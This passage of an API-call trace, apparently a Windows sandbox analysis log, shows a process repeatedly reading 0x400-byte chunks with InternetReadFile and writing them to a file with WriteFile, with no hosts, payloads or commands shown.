lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.628] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.629] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.629] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.629] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.629] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.629] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.629] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.629] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.630] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.630] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.630] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.630] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.630] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.630] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.630] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.630] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.631] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.631] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.631] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.631] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.631] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.631] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.631] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.632] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.632] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.632] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.632] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.632] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.632] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.632] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.632] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.633] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.633] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.633] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.633] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.633] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.633] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.633] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.633] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.634] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.634] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.634] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.634] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.634] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.634] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.634] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.635] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.635] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.635] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.635] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.635] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.635] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.635] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.636] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.636] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.636] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.636] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.636] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.636] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.636] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.637] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.637] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.637] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.637] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.637] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.638] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.638] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.638] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.638] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.638] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.638] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.638] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.638] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.639] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.639] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.639] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.639] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.639] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.639] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.639] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.640] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.640] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.640] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.640] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.640] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.640] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.640] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.640] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.641] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.641] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.641] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.641] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.641] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.641] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.641] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.642] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.642] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.642] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.642] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.642] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.642] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.642] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.643] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.643] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.643] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.643] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.643] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.643] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, 